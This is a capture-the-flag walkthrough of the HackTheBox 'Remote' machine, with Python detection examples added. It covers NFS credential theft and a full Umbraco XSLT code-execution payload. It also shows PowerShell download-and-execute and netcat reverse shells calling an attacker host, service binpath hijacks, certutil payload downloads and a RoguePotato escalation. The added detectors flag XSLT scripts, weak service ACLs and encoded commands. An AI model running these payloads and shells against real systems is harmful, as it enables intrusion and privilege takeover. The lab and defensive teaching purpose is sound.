HackTheBox - Remote


Last updated 4 years ago


Nmap scan results

nmap -p- -A -T4 -oA nmap-remote 10.10.10.180

Let's enumerate the FTP server and see whether it exposes any sensitive or configuration files.

Enumerating webserver (Microsoft HTTPAPI)

Umbraco is an open-source content management system platform for publishing content on the World Wide Web and intranets. It is written in C# and deployed on Microsoft-based infrastructure.

There's a CMS (Content Management System) running, so we can search for potential exploits, but first we will run a gobuster scan in the background.

gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.10.10.180/ -o gob-dir-scan.out -t 50

There are certain exploits available for this CMS but we need to enumerate the version used.

Mounting the NFS Share

NFS, or Network File System, is a distributed file system protocol developed by Sun Microsystems in the early 80s that allows users to view, store, update or share files on a remote computer as though it were local.

mount -t nfs 10.10.10.180:/site_backups /mnt/backups -o nolock

The Umbraco CMS stores its data, including usernames and password hashes, in the Umbraco.sdf file. In the backup it is located at App_data/Umbraco.sdf.

I actually ran strings on the Umbraco.sdf file to get the credentials for admin. We will also need to verify the version used; check the Web.config file.

Get the SHA-1 hash for admin and crack it using John or hashcat.

Now that we have credentials, we can try the authenticated remote code execution exploit.

Exploiting Umbraco's RCE (Authenticated)

This is the vulnerable page at http://10.10.10.180/umbraco/developer/Xslt/xsltVisualize.aspx; the XSLT below embeds an msxsl:script block that runs a command and returns its output.

<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">
<msxsl:script language="C#" implements-prefix="csharp_user">
    public string xml()
    {
        string cmd = "<cmd-arguments>";
        System.Diagnostics.Process proc = new System.Diagnostics.Process();
        proc.StartInfo.FileName = "<cmd>";
        proc.StartInfo.Arguments = cmd;
        proc.StartInfo.UseShellExecute = false;
        proc.StartInfo.RedirectStandardOutput = true;
        proc.Start();
        string output = proc.StandardOutput.ReadToEnd();
        return output;
    }
</msxsl:script>
<xsl:template match="/">
    <xsl:value-of select="csharp_user:xml()"/>
</xsl:template>
</xsl:stylesheet>
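The defensive counterpart, added here and not part of the original writeup: a Python check of the kind a reviewer or upload filter would run on XSLT submitted to the visualiser, flagging any msxsl:script block and the .NET APIs it references. The sample stylesheet is constructed from the payload shape above with the command replaced by a placeholder; the u: prefix and example.invalid namespace are assumptions.

```python
import xml.etree.ElementTree as ET

MSXSL_NS = "urn:schemas-microsoft-com:xslt"

# .NET APIs inside an embedded script that let the transform touch the host
# (spawn processes, read files, reach the network).
DANGEROUS_TOKENS = ("System.Diagnostics.Process", "Process.Start",
                    "System.IO.", "System.Net.")

def find_script_blocks(xslt_text: str) -> list:
    """One record per msxsl:script element, with any dangerous API references."""
    root = ET.fromstring(xslt_text)
    findings = []
    for script in root.iter(f"{{{MSXSL_NS}}}script"):
        body = script.text or ""
        findings.append({
            "language": script.get("language", ""),
            "prefix": script.get("implements-prefix", ""),
            "dangerous": [t for t in DANGEROUS_TOKENS if t in body],
        })
    return findings

def is_safe_stylesheet(xslt_text: str) -> bool:
    """Reject any stylesheet that embeds script at all, dangerous or not."""
    return not find_script_blocks(xslt_text)

# Constructed sample: the shape of the payload above, with the command and its
# arguments replaced by a placeholder so the XML parses.
SAMPLE = """<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
  xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:u="http://example.invalid/u">
<msxsl:script language="C#" implements-prefix="u">
  public string xml() {
    System.Diagnostics.Process proc = new System.Diagnostics.Process();
    proc.StartInfo.FileName = "PLACEHOLDER_CMD";
    proc.StartInfo.RedirectStandardOutput = true;
    proc.Start();
    return proc.StandardOutput.ReadToEnd();
  }
</msxsl:script>
<xsl:template match="/"><xsl:value-of select="u:xml()"/></xsl:template>
</xsl:stylesheet>"""
# Constructed benign stylesheet with no script element.
BENIGN = ('<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">'
          '<xsl:template match="/"><xsl:value-of select="."/></xsl:template></xsl:stylesheet>')

if __name__ == "__main__":
    print(find_script_blocks(SAMPLE), is_safe_stylesheet(BENIGN))
```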
Using nishang's PowerShell script to get a reverse shell

python3 exploit.py -u admin@htb.local -p baconandcheese -i http://10.10.10.180/ -c powershell -a "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.5:8000/shell.ps1')"

Running winpeas.exe (Privilege Escalation)

certutil.exe -urlcache -f http://10.10.14.5:8000/winpeas.exe winpeas.exe

If the group "Authenticated Users" has SERVICE_ALL_ACCESS on a service, it can modify the binary that the service executes. To modify it and execute nc you can do:

sc config <Service_Name> binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"
sc config <Service_Name> binpath= "net localgroup administrators username /add"
sc config <Service_Name> binpath= "cmd /c C:\Users\nc.exe 10.10.10.10 4444 -e cmd.exe"

sc config SSDPSRV binpath= "C:\Documents and Settings\PEPE\meter443.exe"
echo "Iex(New-Object Net.WebClient).downloadString('http://10.10.14.5:8000/shell.ps1')" | iconv -t utf-16le | base64 -w 0
sc.exe config UsoSvc binpath= "cmd.exe /c powershell.exe -EncodedCommand SQBlAHgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADUAOgA4ADAAMAAwAC8AcwBoAGUAbABsAC4AcABzADEAJwApAAoA"
sc.exe start usosvc
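The audit side of the service-permission condition above, as an added example that is not from the original writeup: a Python parser for the SDDL string that sc sdshow prints for a service, reporting any allow-ACE that hands a broad group (Authenticated Users, Users, Everyone, Interactive) a right sufficient to repoint binPath=. Both SDDL samples are constructed; the weak one reproduces the UsoSvc condition.

```python
import re

# Two-letter right codes as `sc sdshow <service>` prints them in SDDL, mapped
# to the service-specific and standard rights they stand for.
SERVICE_RIGHTS = {
    "CC": "SERVICE_QUERY_CONFIG", "DC": "SERVICE_CHANGE_CONFIG",
    "LC": "SERVICE_QUERY_STATUS", "SW": "SERVICE_ENUMERATE_DEPENDENTS",
    "RP": "SERVICE_START", "WP": "SERVICE_STOP", "DT": "SERVICE_PAUSE_CONTINUE",
    "LO": "SERVICE_INTERROGATE", "CR": "SERVICE_USER_DEFINED_CONTROL",
    "SD": "DELETE", "RC": "READ_CONTROL", "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
    "GA": "GENERIC_ALL",
}
# Any of these lets the holder change binPath= (directly or via the DACL).
TAKEOVER = {"DC", "WD", "WO", "GA"}
# Broad, low-privilege trustees that should never hold takeover rights.
BROAD_TRUSTEES = {"AU": "Authenticated Users", "BU": "Users",
                  "WD": "Everyone", "IU": "Interactive"}
# ACE layout: (type;flags;rights;object_guid;inherit_guid;sid); services use no GUIDs.
ACE_RE = re.compile(r"\((A|D);([^;]*);([^;]*);;;([^)]*)\)")

def parse_dacl(sddl: str) -> list:
    """Split the D: section of an SDDL string into ACE records."""
    dacl = sddl.split("D:", 1)[1].split("S:", 1)[0] if "D:" in sddl else ""
    aces = []
    for ace_type, _flags, rights, trustee in ACE_RE.findall(dacl):
        # Rights are two-letter codes; a raw hex mask (0x...) is not decoded here.
        codes = [rights[i:i + 2] for i in range(0, len(rights), 2)]
        aces.append({"type": ace_type, "rights": codes, "trustee": trustee})
    return aces

def weak_aces(sddl: str) -> list:
    """Allow-ACEs granting a broad group takeover rights, as readable findings."""
    findings = []
    for ace in parse_dacl(sddl):
        if ace["type"] != "A" or ace["trustee"] not in BROAD_TRUSTEES:
            continue
        bad = [SERVICE_RIGHTS[c] for c in ace["rights"] if c in TAKEOVER]
        if bad:
            findings.append(f'{BROAD_TRUSTEES[ace["trustee"]]}: {", ".join(bad)}')
    return findings

# Constructed samples: a default-looking DACL (with a SACL appended), and one
# granting Authenticated Users SERVICE_ALL_ACCESS, the UsoSvc condition above.
SAFE_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
             "(A;;CCLCSWLOCRRC;;;IU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")
WEAK_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
             "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)")

if __name__ == "__main__":
    print("safe:", weak_aces(SAFE_SDDL), "weak:", weak_aces(WEAK_SDDL))
```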

Trying Rogue Potato Attack

Download the exploit from here and transfer it to the target machine using certutil.exe:

certutil.exe -urlcache -f http://10.10.14.5:8000/RogueOxidResolver.exe RogueOxidResolver.exe
certutil.exe -urlcache -f http://10.10.14.5:8000/RoguePotato.exe RoguePotato.exe

A CLSID is a globally unique identifier that identifies a COM class object. If your server or container allows linking to its embedded objects, you need to register a CLSID for each supported class of objects.

The exploit doesn't work without providing a CLSID; we can get the CLSID for the UsoSvc service from here.

.\RoguePotato.exe -r 10.10.14.5 -e "powershell.exe -Enc SQBlAHgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADUAOgA4ADAAMAAwAC8AcwBoAGUAbABsAC4AcABzADEAJwApAAoA" -l 9999 -c "{B91D5831-B1BD-4608-8198-D72E155020F7}"
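Both the UsoSvc binpath= line and the RoguePotato -e argument above carry the same base64-wrapped UTF-16LE PowerShell one-liner. As an added example that is not from the original writeup, a Python decoder of the kind a detection pipeline runs over process command lines (Sysmon event 1 or 4688): it reverses the iconv/base64 step, flags download-cradle indicators in the decoded text, and notes when the command line is an sc config binpath= change. The sample command line and the attacker.invalid host are constructed.

```python
import base64
import re
from typing import Optional

# Indicators of a PowerShell download cradle, keyed by a short label.
CRADLE_PATTERNS = {
    "iex": r"\bIEX\b|Invoke-Expression",
    "webclient": r"Net\.WebClient",
    "download": r"Download(?:String|File)|Invoke-WebRequest",
}

def encode_command(script: str) -> str:
    """Same transform as `iconv -t utf-16le | base64 -w 0` in the post."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

def extract_encoded(cmdline: str) -> Optional[str]:
    """Return the base64 argument after -EncodedCommand (or a prefix of it)."""
    m = re.search(r"-(?:EncodedCommand|Enc|ec|e)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    return m.group(1) if m else None

def decode_command(b64: str) -> str:
    """PowerShell expects UTF-16LE text under the base64; reverse that."""
    return base64.b64decode(b64).decode("utf-16-le")

def analyse(cmdline: str) -> dict:
    """Decode any encoded payload in a command line and report indicators."""
    b64 = extract_encoded(cmdline)
    decoded = decode_command(b64) if b64 else ""
    hits = sorted(k for k, p in CRADLE_PATTERNS.items() if re.search(p, decoded, re.I))
    binpath = re.search(r"\bsc(?:\.exe)?\s+config\b.*\bbinpath=", cmdline, re.I)
    return {"encoded": b64 is not None, "decoded": decoded,
            "cradle_indicators": hits, "service_binpath_change": bool(binpath)}

# Constructed sample with the shape of the UsoSvc line above; the download
# host is a placeholder rather than the post's attacker address.
PAYLOAD = "IEX(New-Object Net.WebClient).DownloadString('http://attacker.invalid/shell.ps1')\n"
SAMPLE_CMDLINE = ('sc.exe config UsoSvc binpath= "cmd.exe /c powershell.exe '
                  '-EncodedCommand ' + encode_command(PAYLOAD) + '"')

if __name__ == "__main__":
    print(analyse(SAMPLE_CMDLINE))
```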
